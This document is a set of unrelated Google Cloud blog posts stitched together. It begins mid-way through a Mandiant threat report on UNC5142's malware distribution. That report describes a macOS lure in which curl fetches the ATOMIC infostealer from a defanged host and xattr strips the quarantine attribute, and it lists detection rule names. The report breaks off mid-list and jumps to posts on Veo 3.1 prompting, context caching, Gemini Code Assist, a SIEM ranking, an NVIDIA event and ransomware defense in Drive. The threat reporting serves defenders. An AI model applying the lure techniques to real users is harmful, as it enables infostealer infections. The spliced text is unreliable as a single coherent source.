The actor’s primary evolution was to stop delivering the malware directly as an executable file. Instead, they began hosting encrypted data blobs on services like MediaFire, disguised as media files (.mp4, .mp3). The PowerShell loaders were updated to include decryption routines (e.g., AES, TripleDES) to decode these blobs in memory, revealing a final-stage .NET dropper or the malware itself.
February 2025 & Beyond
The most significant change was the deeper integration of their on-chain infrastructure. Instead of hardcoding the dropper URL in the lure, the CLEARSHORT script began making a direct eth_call to the Third-Level Smart Contract. The smart contract now dynamically provides the URL of the first-stage dropper. This gives the actor complete, real-time control over their post-lure infrastructure; they can change the dropper domain, filename, and the entire subsequent chain by simply sending a single, cheap transaction to their smart contract.
In the infection chain leading to RADTHIEF, Mandiant Threat Defense observed the actor reverting to the older, static method of hardcoding the first-stage URL directly into the lure. This demonstrates that UNC5142 uses a flexible approach, adapting its infection methods to suit each campaign.
Targeting macOS
Notably, the threat cluster has targeted both Windows and macOS systems with their distribution campaigns. In February 2025 and again in April 2025, UNC5142 distributed ATOMIC, an infostealer tailored for macOS. The social engineering lures for these campaigns evolved: while the initial February lure explicitly stated “Instructions For MacOS”, the later April versions were nearly identical to the lures used in their Windows campaigns (Figure 18 and Figure 19). In the February infection chain, the lure prompted the user to run a bash command that retrieved a shell script (Figure 18). This script then used curl to fetch the ATOMIC payload from the remote server hxxps[:]//browser-storage[.]com/update and wrote it to a file named /tmp/update (Figure 20). The use of the xattr command within the bash script is a deliberate defense evasion technique designed to remove the com.apple.quarantine attribute, which prevents macOS from displaying the security prompt that normally requires user confirmation before running a downloaded application for the first time.
Figure 18: macOS “Installation Instructions” CLEARSHORT lure from February 2025
Figure 19: macOS “Verification Steps” CLEARSHORT lure from May 2025
Over the past year, UNC5142 has demonstrated agility, flexibility, and a clear interest in adapting and evolving their operations. Since mid-2024, the threat cluster has tested and incorporated a wide range of changes, including the use of multiple smart contracts, AES encryption of secondary payloads, Cloudflare *.pages.dev pages to host landing pages, and the introduction of the ClickFix social engineering technique. These changes are likely an attempt to bypass security detections, complicate analysis efforts, and increase the success of their operations. The reliance on legitimate platforms such as the BNB Smart Chain and Cloudflare Pages may also lend a layer of legitimacy that helps evade some security detections. Given the frequent updates to the infection chain, coupled with the consistent operational tempo, high volume of compromised websites, and diversity of distributed malware payloads over the past year and a half, it is likely that UNC5142 has experienced some level of success. Despite what appears to be a cessation or pause in UNC5142 activity since July 2025, the threat cluster’s willingness to adopt emerging technology and its track record of consistently evolving its TTPs suggest the actor may have more significantly shifted its operational methods in an attempt to avoid detection.
Acknowledgements
Special acknowledgment to Cian Lynch for involvement in tracking the malware as a service distribution cluster, and to Blas Kojusner for assistance in analyzing infostealer malware samples. We are also grateful to Geoff Ackerman for attribution efforts, as well as Muhammad Umer Khan and Elvis Miezitis for providing detection opportunities. A special thanks goes to Yash Gupta for impactful feedback and coordination, and to Diana Ion for valuable suggestions on the blog post.
Detection Opportunities
The following indicators of compromise (IOCs) and YARA rules are also available as a collection and rule pack in Google Threat Intelligence (GTI).
Detection Through Google Security Operations
Mandiant has made the relevant rules available in the Google SecOps Mandiant Frontline Threats curated detections rule set. The activity detailed in this blog post is associated with several specific MITRE ATT&CK tactics and techniques, which are detected under the following rule names:
Run Utility Spawning Suspicious Process
Mshta Remote File Execution
Powershell Launching Mshta
Suspicious Dns Lookup Events To C2 Top Level Domains
Suspicious Network Connections To Mediafire
Mshta Launching Powershell
Explorer Launches Powershell Hidden Execution
MITRE ATT&CK
Run Utility Spawning Suspicious Process: Tactic TA0003, Technique T1547.001
Mshta Remote File Execution: Tactic TA0005, Technique T1218.005
Powershell Launching Mshta: Tactic TA0005, Technique T1218.005
Suspicious Dns Lookup Events To C2 Top Level Domains
If a picture is worth a thousand words, a video is worth a million.
For creators, generative video holds the promise of bringing any story or concept to life. However, the reality has often been a frustrating cycle of “prompt and pray” – typing a prompt and hoping for a usable result, with little to no control over character consistency, cinematic quality, or narrative coherence.
This guide is a framework for directing Veo 3.1, our latest model that marks a shift from simple generation to creative control. Veo 3.1 builds on Veo 3, with stronger prompt adherence and improved audiovisual quality when turning images into videos.
What you’ll learn in this guide:
Learn Veo 3.1’s full range of capabilities on Vertex AI.
Implement a formula to direct scenes with consistent characters and styles.
Direct video and sound using professional cinematic techniques.
Execute complex ideas by combining Veo with Gemini 2.5 Flash Image (Nano Banana) in advanced workflows.
Veo 3.1 model capabilities
First, it’s essential to understand the model’s full range of capabilities. Veo 3.1 brings audio to existing capabilities to help you craft the perfect scene. These features are experimental and actively improving, and we’re excited to see what you create as we iterate based on your feedback.
Core generation features:
High-fidelity video: Generate video at 720p or 1080p resolution.
Aspect ratio: 16:9 or 9:16
Variable clip length: Create clips of 4, 6, or 8 seconds.
Rich audio & dialogue: Veo 3.1 excels at generating realistic, synchronized sound, from multi-person conversations to precisely timed sound effects, all guided by the prompt.
Complex scene comprehension: The model has a deeper understanding of narrative structure and cinematic styles, enabling it to better depict character interactions and follow storytelling cues.
Advanced creative controls:
Improved image-to-video: Animate a source image with greater prompt adherence and enhanced audio-visual quality.
Consistent elements with “ingredients to video”: Provide reference images of a scene, character, object, or style to maintain a consistent aesthetic across multiple shots. This feature now includes audio generation.
Seamless transitions with “first and last frame”: Generate a natural video transition between a provided start image and end image, complete with audio.
Add/remove object: Introduce new objects or remove existing ones from a generated video. Veo preserves the scene’s original composition.
Digital watermarking: All generated videos are marked with SynthID to indicate the content is AI-generated.
Note: Add/remove object currently utilizes the Veo 2 model and does not generate audio.
A formula for effective prompts
A structured prompt yields consistent, high-quality results. Consider this five-part formula for optimal control.
Cinematography: Define the camera work and shot composition.
Subject: Identify the main character or focal point.
Action: Describe what the subject is doing.
Context: Detail the environment and background elements.
Style & ambiance: Specify the overall aesthetic, mood, and lighting.
Example prompt: Medium shot, a tired corporate worker, rubbing his temples in exhaustion, in front of a bulky 1980s computer in a cluttered office late at night. The scene is lit by the harsh fluorescent overhead lights and the green glow of the monochrome monitor. Retro aesthetic, shot as if on 1980s color film, slightly grainy.
Prompt: Crane shot starting low on a lone hiker and ascending high above, revealing they are standing on the edge of a colossal, mist-filled canyon at sunrise, epic fantasy style, awe-inspiring, soft morning light.
Prompt: Close-up with very shallow depth of field, a young woman’s face, looking out a bus window at the passing city lights with her reflection faintly visible on the glass, inside a bus at night during a rainstorm, melancholic mood with cool blue tones, moody, cinematic.
Veo 3.1 can generate a complete soundtrack based on your text instructions.
Dialogue: Use quotation marks for specific speech (e.g., A woman says, “We have to leave now.”).
Sound effects (SFX): Describe sounds with clarity (e.g., SFX: thunder cracks in the distance).
Ambient noise: Define the background soundscape (e.g., Ambient noise: the quiet hum of a starship bridge).
Mastering negative prompts
To refine your output, describe what you wish to exclude. For example, specify “a desolate landscape with no buildings or roads” instead of “no man-made structures”.
Prompt enhancement with Gemini
If you need to add more detail, use Gemini to analyze and enrich a simple prompt with more descriptive and cinematic language.
Advanced creative workflows
While a single, detailed prompt is powerful, a multi-step workflow offers unparalleled control by breaking down the creative process into manageable stages. The following workflows demonstrate how to combine Veo 3.1’s new capabilities with Gemini 2.5 Flash Image (Nano Banana) to execute complex visions.
Workflow 1: The dynamic transition with “first and last frame”
This technique allows you to create a specific and controlled camera movement or transformation between two distinct points of view.
Step 1: Create the starting frame: Use Gemini 2.5 Flash Image to generate your initial shot.
Gemini 2.5 Flash Image prompt:
“Medium shot of a female pop star singing passionately into a vintage microphone. She is on a dark stage, lit by a single, dramatic spotlight from the front. She has her eyes closed, capturing an emotional moment. Photorealistic, cinematic.”
Step 2: Create the ending frame: Generate a second, complementary image with Gemini 2.5 Flash Image, such as a different POV angle.
Gemini 2.5 Flash Image prompt:
“POV shot from behind the singer on stage, looking out at a large, cheering crowd. The stage lights are bright, creating lens flare. You can see the back of the singer’s head and shoulders in the foreground. The audience is a sea of lights and silhouettes. Energetic atmosphere.”
Step 3: Animate with Veo. Input both images into Veo using the First and Last Frame feature. In your prompt, describe the transition and the audio you want.
Veo 3.1 prompt: “The camera performs a smooth 180-degree arc shot, starting with the front-facing view of the singer and circling around her to seamlessly end on the POV shot from behind her on stage. The singer sings, ‘When you look me in the eyes, I can see a million stars.’”
Workflow 2: Building a dialogue scene with “ingredients to video”
This workflow is ideal for creating a multi-shot scene with consistent characters engaged in conversation, leveraging Veo 3.1’s ability to craft a dialogue.
Step 1: Generate your “ingredients”: Create reference images using Gemini 2.5 Flash Image for your characters and the setting.
Step 2: Compose the scene: Use the Ingredients to Video feature with the relevant reference images.
Prompt: “Using the provided images for the detective, the woman, and the office setting, create a medium shot of the detective behind his desk. He looks up at the woman and says in a weary voice, ‘Of all the offices in this town, you had to walk into mine.’”
Prompt: “Using the provided images for the detective, the woman, and the office setting, create a shot focusing on the woman. A slight, mysterious smile plays on her lips as she replies, ‘You were highly recommended.’”
This workflow allows you to direct a complete, multi-shot sequence with precise cinematic pacing, all within a single generation. By assigning actions to timed segments, you can efficiently create a full scene with multiple distinct shots, saving time and ensuring visual consistency.
Prompt example:
[00:00-00:02] Medium shot from behind a young female explorer with a leather satchel and messy brown hair in a ponytail, as she pushes aside a large jungle vine to reveal a hidden path.
[00:02-00:04] Reverse shot of the explorer's freckled face, her expression filled with awe as she gazes upon ancient, moss-covered ruins in the background. SFX: The rustle of dense leaves, distant exotic bird calls.
[00:04-00:06] Tracking shot following the explorer as she steps into the clearing and runs her hand over the intricate carvings on a crumbling stone wall. Emotion: Wonder and reverence.
[00:06-00:08] Wide, high-angle crane shot, revealing the lone explorer standing small in the center of the vast, forgotten temple complex, half-swallowed by the jungle. SFX: A swelling, gentle orchestral score begins to play.
Start creating with Veo 3.1 in Vertex AI
You now have the framework to direct Veo with precision. The best way to master these techniques is to apply them for real-world use cases.
For developers and enterprise users, the improved Veo 3.1 model is available in preview on Vertex AI via the API. This allows you to experiment with these advanced prompting workflows and build powerful, controlled video generation capabilities directly into your own applications.
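As a rough illustration, a Node.js sketch using the Google Gen AI SDK (@google/genai) against Vertex AI could look like the following. The model ID and configuration fields are assumptions based on the preview naming and may differ from the current API surface, so check the Vertex AI documentation before relying on them.
// Sketch only: generate a clip with Veo 3.1 via the Google Gen AI SDK on Vertex AI.
// Project, location, model ID, and config fields are assumptions/placeholders.
import { GoogleGenAI } from '@google/genai';

const ai = new GoogleGenAI({
  vertexai: true,
  project: 'your-gcp-project', // placeholder
  location: 'us-central1',
});

let operation = await ai.models.generateVideos({
  model: 'veo-3.1-generate-preview', // assumed preview model ID
  prompt:
    'Medium shot, a tired corporate worker, rubbing his temples in exhaustion, ' +
    'in front of a bulky 1980s computer in a cluttered office late at night. ' +
    'Retro aesthetic, shot as if on 1980s color film, slightly grainy.',
  config: { aspectRatio: '16:9' },
});

// Video generation is a long-running operation; poll until it completes.
while (!operation.done) {
  await new Promise((resolve) => setTimeout(resolve, 10000));
  operation = await ai.operations.getVideosOperation({ operation });
}

console.log(operation.response?.generatedVideos?.[0]);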
Thanks to Anish Nangia, Sabareesh Chinta, and Wafae Bakkali for their contributions to prompting guidance for customers.
As developers build increasingly sophisticated AI applications, they often encounter scenarios where substantial amounts of contextual information — be it a lengthy document, a detailed set of system instructions, or a code base — need to be repeatedly sent to the model. While this data provides models with much-needed context for their responses, it often escalates costs and latency due to re-processing of the repeated tokens.
Enter Vertex AI context caching, which Google Cloud first launched in 2024 to tackle this very challenge. Since then, we have continued to improve Gemini serving for improved latency and costs for our customers. Caching works by allowing customers to save and reuse precomputed input tokens. Some benefits include:
Significant cost reduction: Customers pay only 10% of standard input token cost for cached tokens for all supported Gemini 2.5 and above models. For implicit caching, this cost saving is automatically passed on to you when a cache hit occurs. With explicit caching, this discount is guaranteed, providing predictable savings.
Latency: Caching reduces latency by looking up previously computed content instead of recomputing.
Let’s dive deeper into context caching and how you can get started.
What is Vertex AI context caching?
As the name suggests, Vertex AI context caching aims to cache tokens of repeated content, and we offer two types:
Implicit caching: Automatic caching, enabled by default, that provides cost savings when cache hits occur. Without any changes to your API calls, Vertex AI’s serving infrastructure automatically caches tokens and reuses the computed states (KV pairs) from previous requests to speed up subsequent turns and reduce cost. This continues for ensuing prompts; retention depends on overall load and reuse frequency, and caches are always deleted within 24 hours.
Explicit caching: Users get more control over caching behavior by explicitly declaring the content to cache, and can then refer to the cached content in prompts as needed. The explicit caching discount is guaranteed, providing predictable savings.
To support prompts and use cases of various sizes, we’ve enabled caching from a minimum of 2,048 tokens up to the size of the model’s context window, which in the case of Gemini 2.5 Pro is over 1 million tokens. Cached content can be any of the modalities (text, PDF, image, audio, or video) supported by Gemini multimodal models. For example, you can cache a large amount of text, audio, or video. See the list of supported models here.
To make sure users get the benefit of caching wherever and however they use Gemini, both forms of caching support global and regional endpoints. Further, implicit caching is integrated with Provisioned Throughput to ensure production-grade traffic gets the benefits of caching. To add an additional layer of security and compliance, explicit caches can be encrypted using customer-managed encryption keys (CMEK).
Ideal use cases for context caching:
Large-scale document processing: Cache lengthy contracts, case files, or academic, regulatory, finance, or R&D documents to repeatedly query for specific clauses, precedents, or compliance checks.
For example, a financial analyst using Gemini might upload dozens of documents, such as annual reports, that they want to subsequently query, analyze, extract from, and summarize. Instead of re-uploading these documents each time they have a new question or want to start a new analysis, context caching stores the already-processed information. Once the analyst is done with their work, they can manually clear the explicit cache, or the implicit cache will clear automatically.
Building customer support chatbots/conversational agents: To consistently follow a detailed persona or numerous rules, a chatbot can cache these instructions. Similarly, caching product information allows a chatbot to provide relevant content.
For example, a customer support chatbot may have very detailed system instructions on how to respond to user questions, what information can be referenced when helping a user, and more. Instead of recomputing this each time a new customer conversation is started, compute it once and allow chatbots to reference this content. This can lead to significantly faster response times for chatbots and reduced overall costs.
Coding: By keeping a cache version of your codebase, improve codebase Q&A, autocomplete, bug fixing, and feature development.
Caching enterprise knowledge bases (Q&A): For large enterprises, cache complex technical documentation, internal wikis, or compliance manuals. This enables employees to get quick answers to questions about internal processes, technical specifications, or regulatory requirements.
Cost implications for implicit and explicit caching
Implicit caching: Enabled by default for all Google Cloud projects. When cache hits occur on repeated content, we automatically pass on the discount. Tokens that write to the cache are charged as standard input tokens (there is no additional charge to write to the cache).
Explicit caching:
Cached token count: When you create a CachedContent object, you pay a one-time fee for the initial caching of those tokens at the standard input token cost. Subsequently, each time you use this cached content in a generate_content request, you are billed for the cached tokens at a 90% discount compared to sending them as regular input tokens.
Storage duration (TTL): You are also billed for the duration that the cached content is stored, based on its Time-To-Live (TTL). This is an hourly rate per million tokens stored, prorated to the minute.
Best practices and how to optimize cache hit rate:
Check the limitations: First, check that you are within the caching limitations, such as min cache size and supported models.
Granularity and placement: Put the cached/repeated portion of your context at the beginning of the prompt, and avoid caching small, frequently changing pieces.
Monitor usage and costs: Regularly check your Google Cloud billing reports to understand the impact of caching on your expenses. To see how many tokens are cached, see cachedContentTokenCount in the UsageMetadata.
Frequency: Implicit caches are cleared within 24 hours or less; sending repeated requests within a shorter time window keeps the cache available.
For explicit caching specifically:
TTL Management: Set the ttl (Time-To-Live) carefully. A longer TTL incurs more storage cost but reduces recreation overhead. Balance this based on how long your context remains relevant and how frequently it’s accessed.
Get started:
Context caching is a game-changer for optimizing the performance and cost-efficiency of your AI applications. By intelligently leveraging this feature, you can significantly reduce redundant token processing, achieve faster response times, and ultimately build more scalable and cost-effective generative AI solutions.
Implicit caching is enabled by default for all GCP projects, so you can get started today.
To get started with explicit caching, check out our documentation (here is sample code to create your first cache) and a Colab notebook with common examples and code.
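As a rough sketch of that explicit flow, assuming the Google Gen AI SDK for JavaScript (@google/genai) in Vertex AI mode; the model ID, TTL, and placeholder document text are illustrative rather than prescriptive.
// Sketch only: create an explicit cache and reuse it across requests.
// Project, model ID, TTL, and document text are placeholders.
import { GoogleGenAI } from '@google/genai';

const ai = new GoogleGenAI({
  vertexai: true,
  project: 'your-gcp-project', // placeholder
  location: 'us-central1',
});

const LONG_REPORT_TEXT = '...large document text (at least 2,048 tokens)...'; // placeholder

// 1) Create the cache for the large, reusable context. These tokens are charged
//    once at the standard input rate, plus storage for the TTL duration.
const cache = await ai.caches.create({
  model: 'gemini-2.5-flash',
  config: {
    contents: [{ role: 'user', parts: [{ text: LONG_REPORT_TEXT }] }],
    systemInstruction: 'You are a financial analyst assistant.',
    ttl: '3600s', // keep the cache for one hour
  },
});

// 2) Reference the cache on each follow-up question; cached tokens are billed
//    at the discounted rate instead of being reprocessed as fresh input.
const response = await ai.models.generateContent({
  model: 'gemini-2.5-flash',
  contents: 'Summarize the key revenue drivers in the cached report.',
  config: { cachedContent: cache.name },
});

console.log(response.text);
console.log(response.usageMetadata?.cachedContentTokenCount); // tokens served from the cache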
For engineering teams, a critical DORA metric is “Lead Time for Changes,” which measures the time from a code commit to its deployment in production. The 2025 State of AI-Assisted Development Report underscores that manual code review and approval processes are a significant bottleneck, negatively impacting this metric. The report reveals that a combined 60.2% of organizations have a lead time for changes of over a day, with 31.9% taking between a day and a week, and 28.3% taking between a week and a month. This delay is often because senior developers are consumed by manual code reviews, where they enforce coding standards and identify anti-patterns.
The challenge for IT leaders is clear: how do you remove this review bottleneck, especially when your code is spread across complex environments like GitHub Enterprise Cloud or on-premises servers?
Today, we’re introducing a solution to that challenge. We are launching a public preview of Gemini Code Assist on GitHub for enterprise customers, providing AI-powered code reviews built to meet the needs of enterprises.
Works where you work – now with GitHub Enterprise Support
You can’t fix a bottleneck you can’t reach. Our Gemini Code Assist on GitHub app, which targets individual developers and OSS maintainers, was limited to github.com repositories. This enterprise version is built to support the code management options enterprises most commonly use from GitHub, from GitHub Enterprise Cloud (GHEC) to privately hosted GitHub Enterprise Server (on-premises).
Through a secure integration, this feature is the “key” that unlocks code-review automation for your entire enterprise, regardless of which GitHub source code management option you use.
Manage at scale with organization-level controls
A primary challenge for platform admins is deploying and administering AI-assisted code reviews across their repository footprint. This release is designed to make that simple: it gives platform teams the power to define a “golden path” for code quality and automate its enforcement from a central location.
These new org-level settings provide a baseline for all repositories, while still allowing individual teams to set their own repo-level style guides and configurations for further customization.
Central custom style guides: You can now define and enforce a single, organization-wide style guide. The AI agent automates style and syntax feedback, ensuring your specific rules are checked before a human ever sees the PR. This frees your human reviewers to focus on high-value architecture and logic, dramatically shortening the review cycle.
Org-wide configurations: To help you manage notifications at scale, you can now set the comment severity level across your entire organization from a central admin page, with more org-level configurations coming soon.
Enterprise-grade trust and compliance
This release is built on a foundation of enterprise trust and designed with Google Cloud-level security and data protections. The enterprise version of the code review agent operates under the Google Cloud Terms of Service. Prompts containing your code and the corresponding model responses are processed statelessly in Google Cloud services and are not stored. To help protect the privacy of your data, we conform to Google’s privacy commitment for generative AI technologies, including that Google doesn’t use your data to train our models without permission.
This enterprise release is part of our broader effort to bring AI assistance across your entire software development lifecycle.
Recently released: In case you missed it, we also recently launched the Code Review Gemini CLI Extension, bringing powerful AI assistance and agentic capabilities directly to your terminal.
What’s next: We’re just getting started. We are already developing new agentic loop capabilities for the GitHub app to help automate issue resolution and bug fixing. And, we continue to expand our support to other Source Code Management products.
To allow your teams to test and use the agent’s full capabilities, the public preview also includes a significantly higher pull request quota than the individual developer tier.
The evolving security landscape demands more than just speed. It requires an intelligent, automated defense. Google Security Operations is an AI-powered platform built to deliver a modern agentic security operations center (SOC), where generative AI is woven into the fabric of your operations.
We go beyond traditional SIEM and SOAR by using AI as a force multiplier for your team. Gemini automates data analysis, guides investigations with clear insights, and streamlines response actions, which can significantly reduce analyst toil and accelerate the security lifecycle. The result is a highly efficient SOC that empowers your team to proactively hunt threats and stay ahead of adversaries.
We’re excited to share that Gartner has recognized Google as a Leader in the 2025 Gartner® Magic Quadrant™ for Security Information and Event Management (SIEM). In our second year of participation, we’ve been positioned in the leaders quadrant, which can be attributed to our “Ability to Execute” and “Completeness of Vision.” We’re especially proud that we were positioned highest on the “Completeness of Vision” axis amongst all participants.
Gartner also acknowledges our AI and workflow capabilities. They said, “Use of AI is a core competency for Google and its SecOps platform offers strong AI functionality throughout many of the common activities and functions associated with SIEM operations. Its well integrated automation capabilities add to this overall strength.”
Are you a regular user of Google Security Operations? Review your experience on Gartner Peer Insights and get a $25 gift card.
The intelligence-driven, AI-powered platform for the future
Google Security Operations delivers an open, scalable platform infused with Google’s market-leading threat intelligence and AI automation to help SOC teams accelerate their ability to detect, defend against, and respond to threats. Using our platform, customers have seen up to 240% return on investment (ROI) over three years, and have reduced the risk and cost of a breach by as much as 70%.
Teams can use Google Security Operations to detect more threats with less effort through a rich and growing set of curated detections out of the box. These detections are developed and continuously maintained by our team of threat researchers. SOC teams can also use natural language through Gemini to search their data, create detections and response playbooks.
To streamline the work of the SOC, Google Security Operations offers an intuitive experience for security analysts that includes threat-centered case management; interactive, context-rich alert graphing; and automatic stitching together of entities. This experience can help teams investigate and respond with speed and precision using SOAR capabilities. As a direct result of these efficiencies, our customers have seen up to 50% faster mean time to respond (MTTR) and 65% faster mean time to investigate (MTTI).3
Over the last year, we have added significant capabilities that we believe have contributed to our position as a Leader.
Powerful AI workflow augmentation. As a core Google competency, and part of what makes our security operations platform effective, our early investment in generative AI capabilities has helped increase productivity. Strong, tightly-integrated AI functionality through Gemini in Security Operations can boost the everyday activities and functions of security operations teams.
From using natural language to search, generate detections, and create playbooks, to more efficient investigations, our Gemini investigative chat assistant can help SOC analysts gain context and details about cases — and crucial recommendations on how to respond. The platform’s ease-of-use and gen AI capabilities are particularly empowering for new team members, which customers have noted reduced their time to productivity by up to 70%, and shifted up to 35% of security operations work to junior analysts.3
Google Security Operations offers automation that can help improve SOC team workflows and make threat hunting more efficient and effective. We’re also continuing to evolve Google Security Operations automation with AI agents and our vision for the agentic SOC.
The agentic SOC promises a fundamental shift for teams, where intelligent agents work alongside human analysts to autonomously take on routine tasks, augment human decision-making, automate workflows, and empower security experts to focus on the complex investigations and strategic challenges that truly demand human-in-the-loop expertise.
Building for our customers
We feel this ranking reflects our commitment to an open platform that easily integrates into customers’ existing ecosystems through supporting third-party data ingestion, providing federated deployments, enabling multi-tenancy management, and using automation and Gemini to augment security workflows.
Ultimately, our platform’s value is best measured by the confidence it delivers to our customers. As a CISO from an insurance company put it, “In simple terms, Google SecOps is a mass risk-reducer. Threats that would have impacted our business no longer do, because we have greater observability, better mean time to detect, and better mean time to respond.”3
We are grateful for our customers’ trust and for their partnership on this journey. We are committed to working together closely, and to ensuring that our accelerated innovation helps you stay ahead of the evolving threat landscape.
Starting October 27th in Washington, D.C., the future of artificial intelligence (AI) takes center stage, and Google Cloud and NVIDIA are teaming up to lead the conversation. Across two upcoming events—NVIDIA GTC DC and the Google Public Sector Summit—we will showcase our commitment to advancing American AI leadership. This is where innovation meets mission. From developers building next-generation models to government leaders deploying them for mission impact, our partnership is providing the secure, scalable, and powerful foundation needed to solve the nation’s most complex challenges.
NVIDIA GTC DC (October 27-29)
Kicking off the week, NVIDIA GTC DC brings together the brightest minds in AI and high-performance computing. This is your chance to dive deep into the technologies shaping our future.
On October 28, NVIDIA founder and CEO Jensen Huang will unveil the next wave of groundbreaking advancements in HPC and AI infrastructure. His keynote will highlight new frontiers in agentic AI, physical AI, high-performance computing, and quantum computing, setting the stage for a conference that brings together developers, researchers, and industry leaders for over 70 sessions, live demos, and hands-on workshops.
Google Cloud is proud to be a sponsor, addressing a key challenge: how to use the most powerful AI models while keeping your data private and secure. Discover how Google Cloud’s engineering partnership with NVIDIA delivers a platform for mission-critical AI workloads. We combine AI-optimized hardware, open software, and industry solutions, giving you the power to deploy cutting-edge AI models securely wherever your data resides: on-premises, in air-gapped environments, and at the edge.
Google Public Sector Summit (October 29)
Following GTC DC, the focus shifts to the Google Public Sector Summit, a premier gathering of government leaders from federal, defense, national security, and state agencies, as well as research institutions, who come together to dive deeper into the transformative forces shaping the public sector. This new era is defined by unprecedented innovation, greater efficiency, and elevated citizen experiences. We will explore government mission use cases that demonstrate the profound impact of groundbreaking technologies, like the newly launched Gemini for Government.
This year’s Google Public Sector Summit features a truly special moment: a Luminary Talk from Google Cloud CEO Thomas Kurian, followed by a Luminary Fireside Chat with NVIDIA founder and CEO Jensen Huang. They will discuss how our work together is reshaping mission outcomes, accelerating digital transformation, and enabling government agencies to bring AI to their data, wherever it lives.
Join us in Washington, D.C., to explore how, together, we are unlocking innovation for everyone. You’ll get a firsthand look at how mission-proven technology is solving critical public sector challenges, today.
Welcome to the first Cloud CISO Perspectives for October 2025. Today, Kristina Behr, VP, Workspace Product Management, and Jorge Blanco, director, Office of the CISO, explain how a new AI-driven capability in Google Drive can help security and business leaders protect their data and minimize the impact of ransomware attacks.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
Disrupt ransomware with AI in Google Drive
By Kristina Behr, VP, Workspace Product Management, and Jorge Blanco, director, Office of the CISO
We all know that ransomware is a scourge, notorious for evading traditional antivirus and endpoint detection and response solutions, causing great financial and reputational damage to organizations around the world. As part of our efforts to make technology safer and more secure for all, we’ve created a new AI-powered layer of defense against ransomware for Google Workspace customers who use the Google Drive for desktop app for Windows and macOS.
While Google Docs, Sheets, and other native Workspace documents are already secure by design and unaffected by ransomware, and ChromeOS has never had a ransomware attack, we know users rely on a mix of services and file formats, such as Microsoft Office documents and PDFs, across Windows and Mac desktop operating systems.
Recovering from a ransomware attack is disruptive and takes time, usually requiring the IT team to shut down their entire network to restore data and systems from backups. The financial costs of ransomware are staggering: At least $3.1 billion has been paid in ransom for more than 4,900 ransomware attacks since 2021 — and these are only the attacks that we know of because they’ve been reported, said the U.S. government in 2024.
Meanwhile, the average cost of a data breach exceeded $5 million. Year after year, ransomware comprises more than one-fifth of cyberattacks, and in 2024 Mandiant observed that 21% of all intrusions were related to ransomware.
The ability to identify early signals of threats like ransomware is paramount, as they pose a significant systemic risk to organizations. A successful attack can compromise the operational resilience of critical sectors, leading to prolonged downtime and data theft.
For example, ransomware attacks in the financial sector can disrupt the availability of payment systems and markets. The EU’s Digital Operational Resilience Act (DORA) directly addresses this by enforcing strict rules for information and communication technology risk management, resilience testing, and third-party supervision. In addition to financial and recovery costs, failure to comply could lead to operational and regulatory penalties.
Similarly, ransomware that targets healthcare organizations directly jeopardizes patient safety by restricting access to electronic health records and diagnostic tools, resulting in delayed treatments, ambulance diversions, and a measurable, material risk of higher mortality rates. Ransomware has even forced hospitals to permanently close.
Ransomware is an organization-wide threat. The high costs of remediating ransomware are as concerning for boards of directors as they are for CISOs and the security teams who report to them. To help our Workspace customers defend against ransomware attacks, we’ve developed a proprietary AI model that looks for signals that a file has been maliciously modified by ransomware — and stops it before it can spread.
These new capabilities enable smart detection of the file corruption that is characteristic of a ransomware attack, automatically halt syncing to prevent that corruption from reaching cloud-stored assets, and allow for simple recovery and restoration of affected files stored on Google Drive, regardless of file format.
AI-powered ransomware detection in Drive for desktop can help secure essential government, education, and business operations, and also upend the ransomware business model by disrupting attacks in progress and offering rapid file recovery. Importantly, these capabilities have been integrated into the user experience and designed intuitively so that non-technical users can take full advantage. We are rolling this out now at no extra cost for most Google Workspace commercial plans.
How it works
Trained on millions of ransomware samples, this new layer of defense can identify the core signature of a ransomware attack — an attempt to encrypt or corrupt files en masse — and rapidly stop file syncing to the cloud before the ransomware can spread and encrypt the data. It also allows users to easily restore files with a few clicks.
The AI uses a proprietary, deep learning model that continuously looks for signs of maliciously modified files. Its detection engine can identify ransomware by analyzing patterns of file changes as they sync from desktop to Google Drive. The detection uses intelligence from Google’s battle-tested, malware-detection ecosystem, including VirusTotal.
Built-in malware defenses, also available in Gmail and Google Chrome, can help prevent ransomware from spreading to other devices and taking over entire networks. We believe that these layers of defense can help protect organizations in industries such as healthcare, retail, education, manufacturing, and government from being disrupted by ransomware attacks.
Restoring corrupted files
A key capability of this defense empowers customers to restore their files, unlike traditional solutions that require complex re-imaging or costly third-party tools. The Google Drive interface allows users to restore multiple files to a previous, healthy state with just a few clicks.
This rapid recovery capability can help to minimize user interruption and data loss, even when using Microsoft Windows, Office, and other traditional software.
Additional ransomware defenses
As AI augments and even reinvents protection against ransomware in some very powerful ways, it's clear that organizations should do more to adopt a secure-by-design mentality.
There's no single tool that can defeat all ransomware attacks, so we recommend organizations emphasize a layered, defense-in-depth approach. Organizations should incorporate automation and awareness strategies such as strong password policies, mandatory multi-factor authentication, regular reviews of user access and cloud storage bucket security, leaked credential monitoring on the dark web, and account lockout mechanisms.
One way to get started is to identify user groups, including sales and marketing teams, that can transition to more ransomware-resilient endpoints. Moving to devices that run ChromeOS, iOS, and Android could meaningfully reduce security risks — for example, Chromebooks are inherently more resilient against ransomware and malware in general.
For legacy Windows applications that can’t run on the web, we recommend Cameyo as a solution that allows users to continue using Windows apps in a more secure environment, such as ChromeOS.
To learn more about how we’re using AI to stop ransomware with Google Drive, read our recent Workspace blog.
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
Same same but also different: Google guidance on AI supply chain security: At Google, we believe that AI development is similar to traditional software, so existing security measures should readily adapt to AI. Here’s what you need to know. Read more.
How economic threat modeling helps CISOs become chief revenue protection officers: Economic threat modeling is a way of thinking about, identifying, and managing risk in a financially responsible way. Here’s why CISOs should start doing it. Read more.
Digital sovereignty 101: Your questions answered: Here’s what security and business leaders should know about what digital sovereignty is, and how Google Cloud is helping customers achieve it. Read more.
How we’re securing the AI frontier: We’re announcing a new AI Vulnerability Reward Program, an updated Secure AI Framework 2.0 for AI, and the release of our new AI-powered agent CodeMender, which improves code security automatically. Read more.
Accelerating adoption of AI for cybersecurity at DEF CON 33: Empowering cyber defenders with AI is critical as they battle cybercriminals and keep users safe. To help accelerate adoption of AI for cybersecurity workflows, we partnered with Airbus at DEF CON 33 to host the GenSec Capture the Flag (CTF), dedicated to human-AI collaboration in cybersecurity. Read more.
